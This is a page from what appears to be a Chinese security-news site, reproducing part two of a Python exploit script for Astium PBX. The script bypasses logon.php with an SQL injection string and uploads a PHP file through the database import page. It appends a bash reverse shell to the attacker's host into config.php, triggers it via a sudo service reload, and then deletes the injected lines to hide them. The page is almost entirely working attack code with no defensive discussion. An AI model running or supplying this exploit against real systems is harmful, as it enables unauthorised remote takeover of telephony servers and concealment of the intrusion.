Astium PBX 'logon.php'SQL注入等多个安全漏洞(2)


 # PHP script to write our reverse shell to the /usr/local/astium/web/php/config.php script.
 phpScript='''<?php
 $f = fopen("/usr/local/astium/web/php/config.php", "a");
 fwrite($f, "\\n<?php system('/bin/bash -i >& /dev/tcp/%s/%s 0>&1'); ?>");
 fclose($f);
 system("sudo /sbin/service astcfgd reload");
 // Sleep 1 minute, so that we have enough time for the reload to trigger our reverse shell
 sleep(60);
 $lines = file('/usr/local/astium/web/php/config.php');
 // Delete last 2 lines (containing our reverse shell) of the config.php file, else the web interface won't work anymore after our exploit.
 array_pop($lines);
 array_pop($lines);
 $file = join('', $lines);
 $file_handle = fopen('/usr/local/astium/web/php/config.php', 'w');
 fputs($file_handle, $file);
 fclose($file_handle);
 ?>''' % (lhost, lport)

# Create a random file with 8 characters
 filename = ''
 for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',8):
    filename+=i
 filename +=".php"

# Create the form with simple fields
 form = MultiPartForm()
 form.add_field('__act', 'submit')
   
# Add a "fake" file, our simple PHP script.
 form.add_file('importcompany', filename, fileHandle=StringIO(phpScript))

# SQL Injection to bypass login
 SQLiAuthBypass = "system' OR 1='1"

# Our Cookie Jar
 cj = cookielib.CookieJar()
 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

print "[*] Opening index.php to get Cookies"
 # Just open the url to grab the cookies and put them in the jar
 resp = opener.open("http://%s/en/content/index.php" %rhost)

print "[*] Sending evil SQLi authentication bypass payload"
 # Set our post parameters and bypass the logon.php with our SQL Injection
 post_params = urllib.urlencode({'__act' : 'submit', 'user_name' : SQLiAuthBypass, 'pass_word' : 'pwned', 'submit' : 'Login'})
 resp = opener.open("http://%s/en/logon.php" %rhost, post_params)

print "[*] Uploading PHP script " + filename + " to inject PHP code in '/usr/local/astium/web/php/config.php' and run a 'sudo /sbin/service astcfgd reload' to create a reverse shell"
 # Create our multi-part body + headers file upload request
 resp = urllib2.Request("http://%s/en/database/import.php" % rhost)
 body = str(form)
 resp.add_header('Content-type', form.get_content_type())
 resp.add_header('Content-length', len(body))
 resp.add_data(body)
 request = opener.open(resp).read()

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wygzpz.html